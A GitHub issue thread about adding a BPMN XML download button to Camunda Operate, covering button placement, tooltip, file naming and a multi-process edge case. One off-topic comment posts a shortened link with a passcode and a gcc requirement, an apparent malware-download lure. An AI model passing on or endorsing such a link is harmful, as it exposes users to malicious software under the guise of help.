### ISSUE TITLE
I can download the diagram as bpmn xml file

### ISSUE THREAD

**Issue by pedesen** [camunda/camunda#22005]
### Description

The ability to download the business process xml from Operate is often requested by users. It would be beneficial to the users to see which exact version of a business process has been deployed. A button which just provides the xml as a download could be a quick win here.

### User Story

```Gherkin
Scenario: As an Operate user
    Given I am seeing a business process diagram (instances view or instance details view)
    When I click on a download button
    Then I can download the process xml as a file
```
### Acceptance Criteria

- [ ] A button is visible which enables downloading the process xml
- [ ] The button should be visible whenever a diagram is rendered 

### Additional context

- This is implemented in the [bpmn.io demo](https://demo.bpmn.io/s/start) on the diagram canvas. Evaluate if it makes sense to implement in diagram-js / bpmn-js to be available for all webapps which use the BPMN modeler.
- bpmn.io uses the library donwloadjs [here](https://github.com/bpmn-io/bpmn-io-demo/blob/main/client/shared/file-download.js#L3)

#### Internal slack feedback
- https://camunda.slack.com/archives/C9B5270DA/p1725350684466969
- https://camunda.slack.com/archives/C9B5270DA/p1702375774768909
- https://camunda.slack.com/archives/C9B5270DA/p1700222357341809

#### Forum request
- https://forum.camunda.io/t/download-latest-version-of-bpmn-in-operate/51918

### Definition of Ready - Checklist

- [ ] The issue has a meaningful title, description, and testable acceptance criteria
- [ ] If documentation needs to be updated, an issue is created in the [camunda-docs](https://github.com/camunda/camunda-docs) repo, and the issue is added to our Operate project board.
- [ ] If HELM charts need to be updated, an issue is created in the [camunda-platform-heml](https://github.com/camunda/camunda-platform-helm) repo, and the issue is added to our Operate project board.
- [ ] Potential Security risks have been considered and added to the product-hub issue risk assessment
- [ ] Cross-team dependencies have been considered

Optional:
- [ ] Design input has been collected by the assignee
### :point_right: Handover Dev to QA 

- Handy resources: 
     BPMN/DMN models, plugins, scripts, REST API endpoints + example payload, etc : 
     
- Example projects:

- Versions to validate:
> Docker file : in case that it needed to be tested via docker share the version contain the fixed along with version of other services . 

- Release version ( in which version this fixed/feature will be released)

**Comment by yuncheng2024** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by remcowesterhoud** [comment]
@ThorbenLindhauer I'd like to raise attention to this issue in hopes of getting some priority for it. It sounds like it's fairly low-hanging fruit since the xml is already available.

The issue is described from the perspecive of the customer. It's also big quality of life improvement during support cases. Support engineers often need to look at the model in more detail, and we also have to rely on the developer tools to get the response from there. As noticed in the gameday from the 3rd of April 2025 this is not always obvious.

**Comment by ThorbenLindhauer** [comment]
I have shared the issue with Marcos and he will triage it with the Core Features managers.

**Comment by eppdot** [comment]
We looked into this during our mob programming session in team bravo. We have a PoC working and I think we can also push this over the finish line during our next session. Thanks @konstantinos-mylosis @kristinkomschow @koevskinikola @danielkelemen 

@volodymyr-melnykc we just need to align with you where to put the button 😅 We just put it in the process (instance) header on the right (e.g. next to process instance modification, etc.)

**Comment by konstantinos-mylosis** [comment]
A new dummy button (calendar icon) was added at this specific page as shown below.
On click downloads the process instance's bpmn xml and version info.

<img width="1906" height="720" alt="Image" src="https://github.com/user-attachments/assets/24d28e33-8bee-4284-b9fb-ec3c199c5712" />

**Comment by eppdot** [comment]
We could also easily add a button to the diagram controls to download the xml (below zoomIn/Out)

**Comment by remcowesterhoud** [comment]
> We could also easily add a button to the diagram controls to download the xml (below zoomIn/Out)

I like this, because where it is now is where the actions you can perform on a process instance are. It doesn't quite fit with this imo.

**Comment by volodymyr-melnykc** [comment]
I agree that we can place the download button next to the diagram controls (zoom in / out).

When the user hovers over the button show the tooltip:

> Download diagram XML

As an icon, use the `Download` icon from the [Carbon library](https://carbondesignsystem.com/elements/icons/library/). Below is the SVG if you need it.

![Image](https://github.com/user-attachments/assets/3a37e68a-cc4a-4815-81fc-5ca8fdce252b)

Here's the reference to the design in Figma:
- https://www.figma.com/design/r0W0NIFmNncChad1kHnHm6/Operate-in-Carbon?node-id=3333-146359&t=AWHacYPBlDYMBf1e-1

<img width="1584" height="929" alt="Image" src="https://github.com/user-attachments/assets/056bae30-4056-41fc-ac3f-6ff838c239b5" />

cc @konstantinos-mylosis @eppdot

**Comment by eppdot** [comment]
Thanks @volodymyr-melnykc how about naming the downloaded file `diagram.bpmn` instead of `diagram.xml` this way you can easily open it with the modeler (should we then also change the tooltip?). We could also think about using the process definition id as filename 🤔

**Comment by volodymyr-melnykc** [comment]
> Thanks [@volodymyr-melnykc](https://github.com/volodymyr-melnykc) how about naming the downloaded file `diagram.bpmn` instead of `diagram.xml` this way you can easily open it with the modeler (should we then also change the tooltip?). We could also think about using the process definition id as filename 🤔

@eppdot Agree! When downloading a diagram file, it it can have the process definition's name (in lowercase, words concatenated with `-`, e.g. "check-in-process") and a .bpmn extension.

I updated the design with the tooltip.

**Comment by vsgoulart** [comment]
One minor edge problem the solution we currently implemented suffers from is the case where we have 2 process definitions in a single diagram (ultra rare but it happens and it's allowed according to the BPMN spec)

The issue is that the engine doesn't split the XML, so when you use a `processDefinitionKey` to get and XML it might return the XML of 2 processes and we use the name of only one of these processes for the filename of the .bpmn file

It's a minor inconsistency but I guess we can live with it unless someone complains about it

**Comment by falko** [comment]
Thank you @pedesen. It made me really happy to see this being released!
